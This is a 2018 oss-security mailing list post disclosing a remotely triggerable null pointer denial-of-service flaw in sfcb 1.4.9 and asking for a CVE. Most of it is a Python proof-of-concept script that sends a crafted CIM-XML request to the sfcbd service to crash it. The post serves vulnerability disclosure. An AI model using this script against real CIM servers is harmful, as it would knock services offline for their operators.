[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] report a vulnerability in sfcb software.
From: XinleiHe <hxl1999 () yeah ! net>
Date: 2018-01-31 14:44:22
Message-ID: 722994b1.3f3f.1614cad02fb.Coremail.hxl1999 () yeah ! net
[Download RAW message or body]
[Attachment #2 (text/plain)]
Hi there,
I am XinleiHe. I will report a vulnerability in sfcb software.
SFCB is a CIM server for resource-constrained and embedded environments. It's offical website \
is sblim.sourceforge.net/wiki/index.php/Sfcb.
A null pointer vulnerabilty exists in sfcb newest version(1.4.9),a remote attacher can send a \
crafted packet trigger to this vulnerabilty , and make sfcbd DOS. I want to apply a cve id for \
this vulnerabilty.
You can use following python code to reproduce this vulnerability.
--------------------------------------------------------------
import httplib
from xml.dom.minidom import Document
class write_xml(Document):
def __init__(self):
Document.__init__(self)
def set_tag(self,tag):
self.tag = tag
self.cim = self.createElement(self.tag)
#self.setAttribute("encoding", "utf-8")
self.cim.setAttribute("CIMVERSION", "2.0")
self.cim.setAttribute("DTDVERSION", "2.0")
self.appendChild(self.cim)
self.msg = self.createElement("MESSAGE")
self.msg.setAttribute("ID", "4711")
self.msg.setAttribute("PROTOCOLVERSION","1.0")
self.cim.appendChild(self.msg)
self.sim = self.createElement("SIMPLEREQ")
self.msg.appendChild(self.sim)
self.ime = self.createElement("IMETHODCALL")
self.ime.setAttribute("NAME","EnumerateInstances")
self.sim.appendChild(self.ime)
self.local = self.createElement("LOCALNAMESPACEPATH")
self.ime.appendChild(self.local)
self.names1=self.createElement("NAMESPACE")
self.names1.setAttribute("NAME", "root")
self.local.appendChild(self.names1)
def display(self):
print self.toprettyxml(indent=" ")
def retdata(self):
return self.toprettyxml(indent=" ")
def httpreq(data):
conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
conn.request('POST', '/cimom',data)
res = conn.getresponse()
def main():
wx = write_xml()
wx.set_tag('CIM')
print wx.retdata()
print httpreq(wx.retdata())
if __name__=='__main__':
main()
-------------------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic